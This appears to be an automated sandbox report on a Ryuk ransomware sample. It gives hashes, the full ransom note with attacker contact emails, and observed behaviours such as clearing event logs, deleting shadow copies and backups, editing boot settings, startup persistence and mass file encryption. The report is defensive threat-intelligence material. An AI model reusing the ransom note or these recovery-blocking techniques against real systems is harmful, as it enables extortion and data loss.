ryuk | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

Analysis

max time kernel
150s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
09-03-2023 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
Size

885KB
MD5

6a5bf25ff4f72ebca91280ffda057260
SHA1

722063331acdbfc93ccbfacbec045800a835dd9e
SHA256

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512

64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
SSDEEP

12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Vulcanteam@CYBERFEAR.COM or vulcanteam@inboxhub.net You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

Vulcanteam@CYBERFEAR.COM

vulcanteam@inboxhub.net

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 51 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
1676	wevtutil.exe
3768	wevtutil.exe
4448	wevtutil.exe
3652	wevtutil.exe
3348	wevtutil.exe
3504	wevtutil.exe
3000	wevtutil.exe
1364	wevtutil.exe
2072	wevtutil.exe
4644	wevtutil.exe
5064	wevtutil.exe
3736	wevtutil.exe
288	wevtutil.exe
1284	wevtutil.exe
5044	wevtutil.exe
3936	wevtutil.exe
3832	wevtutil.exe
4860	wevtutil.exe
1876	wevtutil.exe
1516	wevtutil.exe
4732	wevtutil.exe
2904	wevtutil.exe
2148	wevtutil.exe
4176	wevtutil.exe
820	wevtutil.exe
1128	wevtutil.exe
2472	wevtutil.exe
2160	wevtutil.exe
3056	wevtutil.exe
2324	wevtutil.exe
1320	wevtutil.exe
4508	wevtutil.exe
4920	wevtutil.exe
2116	wevtutil.exe
5032	wevtutil.exe
4924	wevtutil.exe
2484	wevtutil.exe
3512	wevtutil.exe
3212	wevtutil.exe
3496	wevtutil.exe
4832	wevtutil.exe
2476	wevtutil.exe
424	wevtutil.exe
1108	wevtutil.exe
4748	wevtutil.exe
2700	wevtutil.exe
3992	wevtutil.exe
3308	wevtutil.exe
4548	wevtutil.exe
1620	wevtutil.exe
4496	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1184 bcdedit.exe
1672 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

3000 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation cmd.exe

pid	process
1184	bcdedit.exe
1672	bcdedit.exe

pid	process
3000	wbadmin.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

3964 icacls.exe

pid	process
3964	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\G:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\W:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\B:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\V:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\J:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\N:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\Z:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\U:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\P:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\T:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\R:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\X:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\L:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\A:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\O:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\Q:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\I:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\K:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\M:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\Y:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\H:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\F:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\S:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

Drops file in Program Files directory 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\selector.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File created	C:\Program Files\RyukReadMe.html	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\db2v0801.xsl.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ul-oob.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main.css.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OneNote\prnSendToOneNote_win7.inf.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\security\local_policy.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELM.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\or.pak.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xml.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CSS7DATA000C.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_en_135x40.svg.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sk_get.svg.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MUOPTIN.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fa.pak.DATA.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\cacerts.pem.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\en-US\MSFT_PackageManagementSource.strings.psd1.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\TransparentAdvertisers.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ul.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ul-phn.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Extreme Shadow.eftx.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluCCFilesEmpty_180x180.svg.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\OMICAUTINTL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

Drops file in Windows directory 5 IoCs

Processes:

wbadmin.exe0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File created	C:\Windows\RyukReadMe.txt	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File created	C:\Windows\hrmlog1	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1532 sc.exe
1620 sc.exe
2008 sc.exe
820 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
